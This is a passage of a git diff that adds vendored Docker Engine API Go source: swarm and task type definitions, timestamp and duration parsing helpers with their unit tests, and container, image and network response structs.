+// ExternalCAProtocolCFSSL CFSSL
+const ExternalCAProtocolCFSSL ExternalCAProtocol = "cfssl"
+
+// ExternalCA defines external CA to be used by the cluster.
+type ExternalCA struct {
+	// Protocol is the protocol used by this external CA.
+	Protocol ExternalCAProtocol
+
+	// URL is the URL where the external CA can be reached.
+	URL string
+
+	// Options is a set of additional key/value pairs whose interpretation
+	// depends on the specified CA type.
+	Options map[string]string `json:",omitempty"`
+}
+
+// InitRequest is the request used to init a swarm.
+type InitRequest struct {
+	ListenAddr       string
+	AdvertiseAddr    string
+	ForceNewCluster  bool
+	Spec             Spec
+	AutoLockManagers bool
+}
+
+// JoinRequest is the request used to join a swarm.
+type JoinRequest struct {
+	ListenAddr    string
+	AdvertiseAddr string
+	RemoteAddrs   []string
+	JoinToken     string // accept by secret
+}
+
+// UnlockRequest is the request used to unlock a swarm.
+type UnlockRequest struct {
+	// UnlockKey is the unlock key in ASCII-armored format.
+	UnlockKey string
+}
+
+// LocalNodeState represents the state of the local node.
+type LocalNodeState string
+
+const (
+	// LocalNodeStateInactive INACTIVE
+	LocalNodeStateInactive LocalNodeState = "inactive"
+	// LocalNodeStatePending PENDING
+	LocalNodeStatePending LocalNodeState = "pending"
+	// LocalNodeStateActive ACTIVE
+	LocalNodeStateActive LocalNodeState = "active"
+	// LocalNodeStateError ERROR
+	LocalNodeStateError LocalNodeState = "error"
+	// LocalNodeStateLocked LOCKED
+	LocalNodeStateLocked LocalNodeState = "locked"
+)
+
+// Info represents generic information about swarm.
+type Info struct {
+	NodeID   string
+	NodeAddr string
+
+	LocalNodeState   LocalNodeState
+	ControlAvailable bool
+	Error            string
+
+	RemoteManagers []Peer
+	Nodes          int
+	Managers       int
+
+	Cluster ClusterInfo
+}
+
+// Peer represents a peer.
+type Peer struct {
+	NodeID string
+	Addr   string
+}
+
+// UpdateFlags contains flags for SwarmUpdate.
+type UpdateFlags struct {
+	RotateWorkerToken      bool
+	RotateManagerToken     bool
+	RotateManagerUnlockKey bool
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/task.go b/vendor/github.com/docker/docker/api/types/swarm/task.go
new file mode 100644
index 0000000000..ace12cc89f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/task.go
@@ -0,0 +1,128 @@
+package swarm
+
+import "time"
+
+// TaskState represents the state of a task.
+type TaskState string
+
+const (
+	// TaskStateNew NEW
+	TaskStateNew TaskState = "new"
+	// TaskStateAllocated ALLOCATED
+	TaskStateAllocated TaskState = "allocated"
+	// TaskStatePending PENDING
+	TaskStatePending TaskState = "pending"
+	// TaskStateAssigned ASSIGNED
+	TaskStateAssigned TaskState = "assigned"
+	// TaskStateAccepted ACCEPTED
+	TaskStateAccepted TaskState = "accepted"
+	// TaskStatePreparing PREPARING
+	TaskStatePreparing TaskState = "preparing"
+	// TaskStateReady READY
+	TaskStateReady TaskState = "ready"
+	// TaskStateStarting STARTING
+	TaskStateStarting TaskState = "starting"
+	// TaskStateRunning RUNNING
+	TaskStateRunning TaskState = "running"
+	// TaskStateComplete COMPLETE
+	TaskStateComplete TaskState = "complete"
+	// TaskStateShutdown SHUTDOWN
+	TaskStateShutdown TaskState = "shutdown"
+	// TaskStateFailed FAILED
+	TaskStateFailed TaskState = "failed"
+	// TaskStateRejected REJECTED
+	TaskStateRejected TaskState = "rejected"
+)
+
+// Task represents a task.
+type Task struct {
+	ID string
+	Meta
+	Annotations
+
+	Spec                TaskSpec            `json:",omitempty"`
+	ServiceID           string              `json:",omitempty"`
+	Slot                int                 `json:",omitempty"`
+	NodeID              string              `json:",omitempty"`
+	Status              TaskStatus          `json:",omitempty"`
+	DesiredState        TaskState           `json:",omitempty"`
+	NetworksAttachments []NetworkAttachment `json:",omitempty"`
+}
+
+// TaskSpec represents the spec of a task.
+type TaskSpec struct {
+	ContainerSpec ContainerSpec             `json:",omitempty"`
+	Resources     *ResourceRequirements     `json:",omitempty"`
+	RestartPolicy *RestartPolicy            `json:",omitempty"`
+	Placement     *Placement                `json:",omitempty"`
+	Networks      []NetworkAttachmentConfig `json:",omitempty"`
+
+	// LogDriver specifies the LogDriver to use for tasks created from this
+	// spec. If not present, the one on cluster default on swarm.Spec will be
+	// used, finally falling back to the engine default if not specified.
+	LogDriver *Driver `json:",omitempty"`
+
+	// ForceUpdate is a counter that triggers an update even if no relevant
+	// parameters have been changed.
+	ForceUpdate uint64
+}
+
+// Resources represents resources (CPU/Memory).
+type Resources struct {
+	NanoCPUs    int64 `json:",omitempty"`
+	MemoryBytes int64 `json:",omitempty"`
+}
+
+// ResourceRequirements represents resources requirements.
+type ResourceRequirements struct {
+	Limits       *Resources `json:",omitempty"`
+	Reservations *Resources `json:",omitempty"`
+}
+
+// Placement represents orchestration parameters.
+type Placement struct {
+	Constraints []string `json:",omitempty"`
+}
+
+// RestartPolicy represents the restart policy.
+type RestartPolicy struct {
+	Condition   RestartPolicyCondition `json:",omitempty"`
+	Delay       *time.Duration         `json:",omitempty"`
+	MaxAttempts *uint64                `json:",omitempty"`
+	Window      *time.Duration         `json:",omitempty"`
+}
+
+// RestartPolicyCondition represents when to restart.
+type RestartPolicyCondition string
+
+const (
+	// RestartPolicyConditionNone NONE
+	RestartPolicyConditionNone RestartPolicyCondition = "none"
+	// RestartPolicyConditionOnFailure ON_FAILURE
+	RestartPolicyConditionOnFailure RestartPolicyCondition = "on-failure"
+	// RestartPolicyConditionAny ANY
+	RestartPolicyConditionAny RestartPolicyCondition = "any"
+)
+
+// TaskStatus represents the status of a task.
+type TaskStatus struct {
+	Timestamp       time.Time       `json:",omitempty"`
+	State           TaskState       `json:",omitempty"`
+	Message         string          `json:",omitempty"`
+	Err             string          `json:",omitempty"`
+	ContainerStatus ContainerStatus `json:",omitempty"`
+	PortStatus      PortStatus      `json:",omitempty"`
+}
+
+// ContainerStatus represents the status of a container.
+type ContainerStatus struct {
+	ContainerID string `json:",omitempty"`
+	PID         int    `json:",omitempty"`
+	ExitCode    int    `json:",omitempty"`
+}
+
+// PortStatus represents the port status of a task's host ports whose
+// service has published host ports
+type PortStatus struct {
+	Ports []PortConfig `json:",omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert.go b/vendor/github.com/docker/docker/api/types/time/duration_convert.go
new file mode 100644
index 0000000000..63e1eec19e
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/time/duration_convert.go
@@ -0,0 +1,12 @@
+package time
+
+import (
+	"strconv"
+	"time"
+)
+
+// DurationToSecondsString converts the specified duration to the number
+// seconds it represents, formatted as a string.
+func DurationToSecondsString(duration time.Duration) string {
+	return strconv.FormatFloat(duration.Seconds(), 'f', 0, 64)
+}
diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go
new file mode 100644
index 0000000000..869c08f863
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go
@@ -0,0 +1,26 @@
+package time
+
+import (
+	"testing"
+	"time"
+)
+
+func TestDurationToSecondsString(t *testing.T) {
+	cases := []struct {
+		in       time.Duration
+		expected string
+	}{
+		{0 * time.Second, "0"},
+		{1 * time.Second, "1"},
+		{1 * time.Minute, "60"},
+		{24 * time.Hour, "86400"},
+	}
+
+	for _, c := range cases {
+		s := DurationToSecondsString(c.in)
+		if s != c.expected {
+			t.Errorf("wrong value for input `%v`: expected `%s`, got `%s`", c.in, c.expected, s)
+			t.Fail()
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp.go b/vendor/github.com/docker/docker/api/types/time/timestamp.go
new file mode 100644
index 0000000000..d3695ba723
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/time/timestamp.go
@@ -0,0 +1,124 @@
+package time
+
+import (
+	"fmt"
+	"math"
+	"strconv"
+	"strings"
+	"time"
+)
+
+// These are additional predefined layouts for use in Time.Format and Time.Parse
+// with --since and --until parameters for `docker logs` and `docker events`
+const (
+	rFC3339Local     = "2006-01-02T15:04:05"           // RFC3339 with local timezone
+	rFC3339NanoLocal = "2006-01-02T15:04:05.999999999" // RFC3339Nano with local timezone
+	dateWithZone     = "2006-01-02Z07:00"              // RFC3339 with time at 00:00:00
+	dateLocal        = "2006-01-02"                    // RFC3339 with local timezone and time at 00:00:00
+)
+
+// GetTimestamp tries to parse given string as golang duration,
+// then RFC3339 time and finally as a Unix timestamp. If
+// any of these were successful, it returns a Unix timestamp
+// as string otherwise returns the given value back.
+// In case of duration input, the returned timestamp is computed
+// as the given reference time minus the amount of the duration.
+func GetTimestamp(value string, reference time.Time) (string, error) {
+	if d, err := time.ParseDuration(value); value != "0" && err == nil {
+		return strconv.FormatInt(reference.Add(-d).Unix(), 10), nil
+	}
+
+	var format string
+	var parseInLocation bool
+
+	// if the string has a Z or a + or three dashes use parse otherwise use parseinlocation
+	parseInLocation = !(strings.ContainsAny(value, "zZ+") || strings.Count(value, "-") == 3)
+
+	if strings.Contains(value, ".") {
+		if parseInLocation {
+			format = rFC3339NanoLocal
+		} else {
+			format = time.RFC3339Nano
+		}
+	} else if strings.Contains(value, "T") {
+		// we want the number of colons in the T portion of the timestamp
+		tcolons := strings.Count(value, ":")
+		// if parseInLocation is off and we have a +/- zone offset (not Z) then
+		// there will be an extra colon in the input for the tz offset subtract that
+		// colon from the tcolons count
+		if !parseInLocation && !strings.ContainsAny(value, "zZ") && tcolons > 0 {
+			tcolons--
+		}
+		if parseInLocation {
+			switch tcolons {
+			case 0:
+				format = "2006-01-02T15"
+			case 1:
+				format = "2006-01-02T15:04"
+			default:
+				format = rFC3339Local
+			}
+		} else {
+			switch tcolons {
+			case 0:
+				format = "2006-01-02T15Z07:00"
+			case 1:
+				format = "2006-01-02T15:04Z07:00"
+			default:
+				format = time.RFC3339
+			}
+		}
+	} else if parseInLocation {
+		format = dateLocal
+	} else {
+		format = dateWithZone
+	}
+
+	var t time.Time
+	var err error
+
+	if parseInLocation {
+		t, err = time.ParseInLocation(format, value, time.FixedZone(reference.Zone()))
+	} else {
+		t, err = time.Parse(format, value)
+	}
+
+	if err != nil {
+		// if there is a `-` then its an RFC3339 like timestamp otherwise assume unixtimestamp
+		if strings.Contains(value, "-") {
+			return "", err // was probably an RFC3339 like timestamp but the parser failed with an error
+		}
+		return value, nil // unixtimestamp in and out case (meaning: the value passed at the command line is already in the right format for passing to the server)
+	}
+
+	return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())), nil
+}
+
+// ParseTimestamps returns seconds and nanoseconds from a timestamp that has the
+// format "%d.%09d", time.Unix(), int64(time.Nanosecond()))
+// if the incoming nanosecond portion is longer or shorter than 9 digits it is
+// converted to nanoseconds.  The expectation is that the seconds and
+// seconds will be used to create a time variable.  For example:
+//     seconds, nanoseconds, err := ParseTimestamp("1136073600.000000001",0)
+//     if err == nil since := time.Unix(seconds, nanoseconds)
+// returns seconds as def(aultSeconds) if value == ""
+func ParseTimestamps(value string, def int64) (int64, int64, error) {
+	if value == "" {
+		return def, 0, nil
+	}
+	sa := strings.SplitN(value, ".", 2)
+	s, err := strconv.ParseInt(sa[0], 10, 64)
+	if err != nil {
+		return s, 0, err
+	}
+	if len(sa) != 2 {
+		return s, 0, nil
+	}
+	n, err := strconv.ParseInt(sa[1], 10, 64)
+	if err != nil {
+		return s, n, err
+	}
+	// should already be in nanoseconds but just in case convert n to nanoseonds
+	n = int64(float64(n) * math.Pow(float64(10), float64(9-len(sa[1]))))
+	return s, n, nil
+}
diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp_test.go b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go
new file mode 100644
index 0000000000..a1651309d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go
@@ -0,0 +1,93 @@
+package time
+
+import (
+	"fmt"
+	"testing"
+	"time"
+)
+
+func TestGetTimestamp(t *testing.T) {
+	now := time.Now().In(time.UTC)
+	cases := []struct {
+		in, expected string
+		expectedErr  bool
+	}{
+		// Partial RFC3339 strings get parsed with second precision
+		{"2006-01-02T15:04:05.999999999+07:00", "1136189045.999999999", false},
+		{"2006-01-02T15:04:05.999999999Z", "1136214245.999999999", false},
+		{"2006-01-02T15:04:05.999999999", "1136214245.999999999", false},
+		{"2006-01-02T15:04:05Z", "1136214245.000000000", false},
+		{"2006-01-02T15:04:05", "1136214245.000000000", false},
+		{"2006-01-02T15:04:0Z", "", true},
+		{"2006-01-02T15:04:0", "", true},
+		{"2006-01-02T15:04Z", "1136214240.000000000", false},
+		{"2006-01-02T15:04+00:00", "1136214240.000000000", false},
+		{"2006-01-02T15:04-00:00", "1136214240.000000000", false},
+		{"2006-01-02T15:04", "1136214240.000000000", false},
+		{"2006-01-02T15:0Z", "", true},
+		{"2006-01-02T15:0", "", true},
+		{"2006-01-02T15Z", "1136214000.000000000", false},
+		{"2006-01-02T15+00:00", "1136214000.000000000", false},
+		{"2006-01-02T15-00:00", "1136214000.000000000", false},
+		{"2006-01-02T15", "1136214000.000000000", false},
+		{"2006-01-02T1Z", "1136163600.000000000", false},
+		{"2006-01-02T1", "1136163600.000000000", false},
+		{"2006-01-02TZ", "", true},
+		{"2006-01-02T", "", true},
+		{"2006-01-02+00:00", "1136160000.000000000", false},
+		{"2006-01-02-00:00", "1136160000.000000000", false},
+		{"2006-01-02-00:01", "1136160060.000000000", false},
+		{"2006-01-02Z", "1136160000.000000000", false},
+		{"2006-01-02", "1136160000.000000000", false},
+		{"2015-05-13T20:39:09Z", "1431549549.000000000", false},
+
+		// unix timestamps returned as is
+		{"1136073600", "1136073600", false},
+		{"1136073600.000000001", "1136073600.000000001", false},
+		// Durations
+		{"1m", fmt.Sprintf("%d", now.Add(-1*time.Minute).Unix()), false},
+		{"1.5h", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false},
+		{"1h30m", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false},
+
+		// String fallback
+		{"invalid", "invalid", false},
+	}
+
+	for _, c := range cases {
+		o, err := GetTimestamp(c.in, now)
+		if o != c.expected ||
+			(err == nil && c.expectedErr) ||
+			(err != nil && !c.expectedErr) {
+			t.Errorf("wrong value for '%s'. expected:'%s' got:'%s' with error: `%s`", c.in, c.expected, o, err)
+			t.Fail()
+		}
+	}
+}
+
+func TestParseTimestamps(t *testing.T) {
+	cases := []struct {
+		in                        string
+		def, expectedS, expectedN int64
+		expectedErr               bool
+	}{
+		// unix timestamps
+		{"1136073600", 0, 1136073600, 0, false},
+		{"1136073600.000000001", 0, 1136073600, 1, false},
+		{"1136073600.0000000010", 0, 1136073600, 1, false},
+		{"1136073600.00000001", 0, 1136073600, 10, false},
+		{"foo.bar", 0, 0, 0, true},
+		{"1136073600.bar", 0, 1136073600, 0, true},
+		{"", -1, -1, 0, false},
+	}
+
+	for _, c := range cases {
+		s, n, err := ParseTimestamps(c.in, c.def)
+		if s != c.expectedS ||
+			n != c.expectedN ||
+			(err == nil && c.expectedErr) ||
+			(err != nil && !c.expectedErr) {
+			t.Errorf("wrong values for input `%s` with default `%d` expected:'%d'seconds and `%d`nanosecond got:'%d'seconds and `%d`nanoseconds with error: `%s`", c.in, c.def, c.expectedS, c.expectedN, s, n, err)
+			t.Fail()
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/types/types.go b/vendor/github.com/docker/docker/api/types/types.go
new file mode 100644
index 0000000000..a82c3e88ef
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/types.go
@@ -0,0 +1,549 @@
+package types
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/api/types/network"
+	"github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/go-connections/nat"
+)
+
+// ContainerChange contains response of Engine API:
+// GET "/containers/{name:.*}/changes"
+type ContainerChange struct {
+	Kind int
+	Path string
+}
+
+// ImageHistory contains response of Engine API:
+// GET "/images/{name:.*}/history"
+type ImageHistory struct {
+	ID        string `json:"Id"`
+	Created   int64
+	CreatedBy string
+	Tags      []string
+	Size      int64
+	Comment   string
+}
+
+// ImageDelete contains response of Engine API:
+// DELETE "/images/{name:.*}"
+type ImageDelete struct {
+	Untagged string `json:",omitempty"`
+	Deleted  string `json:",omitempty"`
+}
+
+// GraphDriverData returns Image's graph driver config info
+// when calling inspect command
+type GraphDriverData struct {
+	Name string
+	Data map[string]string
+}
+
+// RootFS returns Image's RootFS description including the layer IDs.
+type RootFS struct {
+	Type      string
+	Layers    []string `json:",omitempty"`
+	BaseLayer string   `json:",omitempty"`
+}
+
+// ImageInspect contains response of Engine API:
+// GET "/images/{name:.*}/json"
+type ImageInspect struct {
+	ID              string `json:"Id"`
+	RepoTags        []string
+	RepoDigests     []string
+	Parent          string
+	Comment         string
+	Created         string
+	Container       string
+	ContainerConfig *container.Config
+	DockerVersion   string
+	Author          string
+	Config          *container.Config
+	Architecture    string
+	Os              string
+	OsVersion       string `json:",omitempty"`
+	Size            int64
+	VirtualSize     int64
+	GraphDriver     GraphDriverData
+	RootFS          RootFS
+}
+
+// Container contains response of Engine API:
+// GET "/containers/json"
+type Container struct {
+	ID         string `json:"Id"`
+	Names      []string
+	Image      string
+	ImageID    string
+	Command    string
+	Created    int64
+	Ports      []Port
+	SizeRw     int64 `json:",omitempty"`
+	SizeRootFs int64 `json:",omitempty"`
+	Labels     map[string]string
+	State      string
+	Status     string
+	HostConfig struct {
+		NetworkMode string `json:",omitempty"`
+	}
+	NetworkSettings *SummaryNetworkSettings
+	Mounts          []MountPoint
+}
+
+// CopyConfig contains request body of Engine API:
+// POST "/containers/"+containerID+"/copy"
+type CopyConfig struct {
+	Resource string
+}
+
+// ContainerPathStat is used to encode the header from
+// GET "/containers/{name:.*}/archive"
+// "Name" is the file or directory name.
+type ContainerPathStat struct {
+	Name       string      `json:"name"`
+	Size       int64       `json:"size"`
+	Mode       os.FileMode `json:"mode"`
+	Mtime      time.Time   `json:"mtime"`
+	LinkTarget string      `json:"linkTarget"`
+}
+
+// ContainerStats contains response of Engine API:
+// GET "/stats"
+type ContainerStats struct {
+	Body   io.ReadCloser `json:"body"`
+	OSType string        `json:"ostype"`
+}
+
+// ContainerProcessList contains response of Engine API:
+// GET "/containers/{name:.*}/top"
+type ContainerProcessList struct {
+	Processes [][]string
+	Titles    []string
+}
+
+// Ping contains response of Engine API:
+// GET "/_ping"
+type Ping struct {
+	APIVersion   string
+	Experimental bool
+}
+
+// Version contains response of Engine API:
+// GET "/version"
+type Version struct {
+	Version       string
+	APIVersion    string `json:"ApiVersion"`
+	MinAPIVersion string `json:"MinAPIVersion,omitempty"`
+	GitCommit     string
+	GoVersion     string
+	Os            string
+	Arch          string
+	KernelVersion string `json:",omitempty"`
+	Experimental  bool   `json:",omitempty"`
+	BuildTime     string `json:",omitempty"`
+}
+
+// Commit records a external tool actual commit id version along the
+// one expect by dockerd as set at build time
+type Commit struct {
+	ID       string
+	Expected string
+}
+
+// Info contains response of Engine API:
+// GET "/info"
+type Info struct {
+	ID                 string
+	Containers         int
+	ContainersRunning  int
+	ContainersPaused   int
+	ContainersStopped  int
+	Images             int
+	Driver             string
+	DriverStatus       [][2]string
+	SystemStatus       [][2]string
+	Plugins            PluginsInfo
+	MemoryLimit        bool
+	SwapLimit          bool
+	KernelMemory       bool
+	CPUCfsPeriod       bool `json:"CpuCfsPeriod"`
+	CPUCfsQuota        bool `json:"CpuCfsQuota"`
+	CPUShares          bool
+	CPUSet             bool
+	IPv4Forwarding     bool
+	BridgeNfIptables   bool
+	BridgeNfIP6tables  bool `json:"BridgeNfIp6tables"`
+	Debug              bool
+	NFd                int
+	OomKillDisable     bool
+	NGoroutines        int
+	SystemTime         string
+	LoggingDriver      string
+	CgroupDriver       string
+	NEventsListener    int
+	KernelVersion      string
+	OperatingSystem    string
+	OSType             string
+	Architecture       string
+	IndexServerAddress string
+	RegistryConfig     *registry.ServiceConfig
+	NCPU               int
+	MemTotal           int64
+	DockerRootDir      string
+	HTTPProxy          string `json:"HttpProxy"`
+	HTTPSProxy         string `json:"HttpsProxy"`
+	NoProxy            string
+	Name               string
+	Labels             []string
+	ExperimentalBuild  bool
+	ServerVersion      string
+	ClusterStore       string
+	ClusterAdvertise   string
+	Runtimes           map[string]Runtime
+	DefaultRuntime     string
+	Swarm              swarm.Info
+	// LiveRestoreEnabled determines whether containers should be kept
+	// running when the daemon is shutdown or upon daemon start if
+	// running containers are detected
+	LiveRestoreEnabled bool
+	Isolation          container.Isolation
+	InitBinary         string
+	ContainerdCommit   Commit
+	RuncCommit         Commit
+	InitCommit         Commit
+	SecurityOptions    []string
+}
+
+// KeyValue holds a key/value pair
+type KeyValue struct {
+	Key, Value string
+}
+
+// SecurityOpt contains the name and options of a security option
+type SecurityOpt struct {
+	Name    string
+	Options []KeyValue
+}
+
+// DecodeSecurityOptions decodes a security options string slice to a type safe
+// SecurityOpt
+func DecodeSecurityOptions(opts []string) ([]SecurityOpt, error) {
+	so := []SecurityOpt{}
+	for _, opt := range opts {
+		// support output from a < 1.13 docker daemon
+		if !strings.Contains(opt, "=") {
+			so = append(so, SecurityOpt{Name: opt})
+			continue
+		}
+		secopt := SecurityOpt{}
+		split := strings.Split(opt, ",")
+		for _, s := range split {
+			kv := strings.SplitN(s, "=", 2)
+			if len(kv) != 2 {
+				return nil, fmt.Errorf("invalid security option %q", s)
+			}
+			if kv[0] == "" || kv[1] == "" {
+				return nil, errors.New("invalid empty security option")
+			}
+			if kv[0] == "name" {
+				secopt.Name = kv[1]
+				continue
+			}
+			secopt.Options = append(secopt.Options, KeyValue{Key: kv[0], Value: kv[1]})
+		}
+		so = append(so, secopt)
+	}
+	return so, nil
+}
+
+// PluginsInfo is a temp struct holding Plugins name
+// registered with docker daemon. It is used by Info struct
+type PluginsInfo struct {
+	// List of Volume plugins registered
+	Volume []string
+	// List of Network plugins registered
+	Network []string
+	// List of Authorization plugins registered
+	Authorization []string
+}
+
+// ExecStartCheck is a temp struct used by execStart
+// Config fields is part of ExecConfig in runconfig package
+type ExecStartCheck struct {
+	// ExecStart will first check if it's detached
+	Detach bool
+	// Check if there's a tty
+	Tty bool
+}
+
+// HealthcheckResult stores information about a single run of a healthcheck probe
+type HealthcheckResult struct {
+	Start    time.Time // Start is the time this check started
+	End      time.Time // End is the time this check ended
+	ExitCode int       // ExitCode meanings: 0=healthy, 1=unhealthy, 2=reserved (considered unhealthy), else=error running probe
+	Output   string    // Output from last check
+}
+
+// Health states
+const (
+	NoHealthcheck = "none"      // Indicates there is no healthcheck
+	Starting      = "starting"  // Starting indicates that the container is not yet ready
+	Healthy       = "healthy"   // Healthy indicates that the container is running correctly
+	Unhealthy     = "unhealthy" // Unhealthy indicates that the container has a problem
+)
+
+// Health stores information about the container's healthcheck results
+type Health struct {
+	Status        string               // Status is one of Starting, Healthy or Unhealthy
+	FailingStreak int                  // FailingStreak is the number of consecutive failures
+	Log           []*HealthcheckResult // Log contains the last few results (oldest first)
+}
+
+// ContainerState stores container's running state
+// it's part of ContainerJSONBase and will return by "inspect" command
+type ContainerState struct {
+	Status     string
+	Running    bool
+	Paused     bool
+	Restarting bool
+	OOMKilled  bool
+	Dead       bool
+	Pid        int
+	ExitCode   int
+	Error      string
+	StartedAt  string
+	FinishedAt string
+	Health     *Health `json:",omitempty"`
+}
+
+// ContainerNode stores information about the node that a container
+// is running on.  It's only available in Docker Swarm
+type ContainerNode struct {
+	ID        string
+	IPAddress string `json:"IP"`
+	Addr      string
+	Name      string
+	Cpus      int
+	Memory    int64
+	Labels    map[string]string
+}
+
+// ContainerJSONBase contains response of Engine API:
+// GET "/containers/{name:.*}/json"
+type ContainerJSONBase struct {
+	ID              string `json:"Id"`
+	Created         string
+	Path            string
+	Args            []string
+	State           *ContainerState
+	Image           string
+	ResolvConfPath  string
+	HostnamePath    string
+	HostsPath       string
+	LogPath         string
+	Node            *ContainerNode `json:",omitempty"`
+	Name            string
+	RestartCount    int
+	Driver          string
+	MountLabel      string
+	ProcessLabel    string
+	AppArmorProfile string
+	ExecIDs         []string
+	HostConfig      *container.HostConfig
+	GraphDriver     GraphDriverData
+	SizeRw          *int64 `json:",omitempty"`
+	SizeRootFs      *int64 `json:",omitempty"`
+}
+
+// ContainerJSON is newly used struct along with MountPoint
+type ContainerJSON struct {
+	*ContainerJSONBase
+	Mounts          []MountPoint
+	Config          *container.Config
+	NetworkSettings *NetworkSettings
+}
+
+// NetworkSettings exposes the network settings in the api
+type NetworkSettings struct {
+	NetworkSettingsBase
+	DefaultNetworkSettings
+	Networks map[string]*network.EndpointSettings
+}
+
+// SummaryNetworkSettings provides a summary of container's networks
+// in /containers/json
+type SummaryNetworkSettings struct {
+	Networks map[string]*network.EndpointSettings
+}
+
+// NetworkSettingsBase holds basic information about networks
+type NetworkSettingsBase struct {
+	Bridge                 string      // Bridge is the Bridge name the network uses(e.g. `docker0`)
+	SandboxID              string      // SandboxID uniquely represents a container's network stack
+	HairpinMode            bool        // HairpinMode specifies if hairpin NAT should be enabled on the virtual interface
+	LinkLocalIPv6Address   string      // LinkLocalIPv6Address is an IPv6 unicast address using the link-local prefix
+	LinkLocalIPv6PrefixLen int         // LinkLocalIPv6PrefixLen is the prefix length of an IPv6 unicast address
+	Ports                  nat.PortMap // Ports is a collection of PortBinding indexed by Port
+	SandboxKey             string      // SandboxKey identifies the sandbox
+	SecondaryIPAddresses   []network.Address
+	SecondaryIPv6Addresses []network.Address
+}
+
+// DefaultNetworkSettings holds network information
+// during the 2 release deprecation period.
+// It will be removed in Docker 1.11.
+type DefaultNetworkSettings struct {
+	EndpointID          string // EndpointID uniquely represents a service endpoint in a Sandbox
+	Gateway             string // Gateway holds the gateway address for the network
+	GlobalIPv6Address   string // GlobalIPv6Address holds network's global IPv6 address
+	GlobalIPv6PrefixLen int    // GlobalIPv6PrefixLen represents mask length of network's global IPv6 address
+	IPAddress           string // IPAddress holds the IPv4 address for the network
+	IPPrefixLen         int    // IPPrefixLen represents mask length of network's IPv4 address
+	IPv6Gateway         string // IPv6Gateway holds gateway address specific for IPv6
+	MacAddress          string // MacAddress holds the MAC address for the network
+}
+
+// MountPoint represents a mount point configuration inside the container.
+// This is used for reporting the mountpoints in use by a container.
+type MountPoint struct {
+	Type        mount.Type `json:",omitempty"`
+	Name        string     `json:",omitempty"`
+	Source      string
+	Destination string
+	Driver      string `json:",omitempty"`
+	Mode        string
+	RW          bool
+	Propagation mount.Propagation
+}
+
+// NetworkResource is the body of the "get network" http response message
+type NetworkResource struct {
+	Name       string                      // Name is the requested name of the network
+	ID         string                      `json:"Id"` // ID uniquely identifies a network on a single machine
+	Created    time.Time                   // Created is the time the network created
+	Scope      string                      // Scope describes the level at which the network exists (e.g. `global` for cluster-wide or `local` for machine level)
+	Driver     string                      // Driver is the Driver name used to create the network (e.g. `bridge`, `overlay`)
+	EnableIPv6 bool                        // EnableIPv6 represents whether to enable IPv6
+	IPAM       network.IPAM                // IPAM is the network's IP Address Management
+	Internal   bool                        // Internal represents if the network is used internal only
+	Attachable bool                        // Attachable represents if the global scope is manually attachable by regular containers from workers in swarm mode.
+	Containers map[string]EndpointResource // Containers contains endpoints belonging to the network
+	Options    map[string]string           // Options holds the network specific options to use for when creating the network
+	Labels     map[string]string           // Labels holds metadata specific to the network being created
+	Peers      []network.PeerInfo          `json:",omitempty"` // List of peer nodes for an overlay network
+}
+
+// EndpointResource contains network resources allocated and used for a container in a network
+type EndpointResource struct {
+	Name        string
+	EndpointID  string
+	MacAddress  string
+	IPv4Address string
+	IPv6Address string
+}
+
+// NetworkCreate is the expected body of the "create network" http request message
+type NetworkCreate struct {
+	CheckDuplicate bool
+	Driver         string
+	EnableIPv6     bool
+	IPAM           *network.IPAM
+	Internal       bool
+	Attachable     bool
+	Options        map[string]string
+	Labels         map[string]string
+}
+
+// NetworkCreateRequest is the request message sent to the server for network create call.
+type NetworkCreateRequest struct {
+	NetworkCreate
+	Name string
+}
+
+// NetworkCreateResponse is the response message sent by the server for network create call
+type NetworkCreateResponse struct {
+	ID      string `json:"Id"`
+	Warning string
+}
+
+// NetworkConnect represents the data to be used to connect a container to the network
+type NetworkConnect struct {
+	Container      string
+	EndpointConfig *network.EndpointSettings `json:",omitempty"`
+}
+
+// NetworkDisconnect represents the data to be used to disconnect a container from the network
+type NetworkDisconnect struct {
+	Container string
+	Force     bool
+}
+
+// Checkpoint represents the details of a checkpoint
+type Checkpoint struct {
+	Name string // Name is the name of the checkpoint
+}
+
+// Runtime describes an OCI runtime
+type Runtime struct {
+	Path string   `json:"path"`
+	Args []string `json:"runtimeArgs,omitempty"`
+}
+
+// DiskUsage contains response of Engine API:
+// GET "/system/df"
+type DiskUsage struct {
+	LayersSize int64
+	Images     []*ImageSummary
+	Containers []*Container
+	Volumes    []*Volume
+}
+
+// ContainersPruneReport contains the response for Engine API:
+// POST "/containers/prune"
+type ContainersPruneReport struct {
+	ContainersDeleted []string
+	SpaceReclaimed    uint64
+}
+
+// VolumesPruneReport contains the response for Engine API:
+// POST "/volumes/prune"
+type VolumesPruneReport struct {
+	VolumesDeleted []string
+	SpaceReclaimed uint64
+}
+
+// ImagesPruneReport contains the response for Engine API:
+// POST "/images/prune"
+type ImagesPruneReport struct {
+	ImagesDeleted  []ImageDelete
+	SpaceReclaimed uint64
+}
+
+// NetworksPruneReport contains the response for Engine API:
+// POST "/networks/prune"
+type NetworksPruneReport struct {
+	NetworksDeleted []string
+}
+
+// SecretCreateResponse contains the information returned to a client
+// on the creation of a new secret.
+type SecretCreateResponse struct {
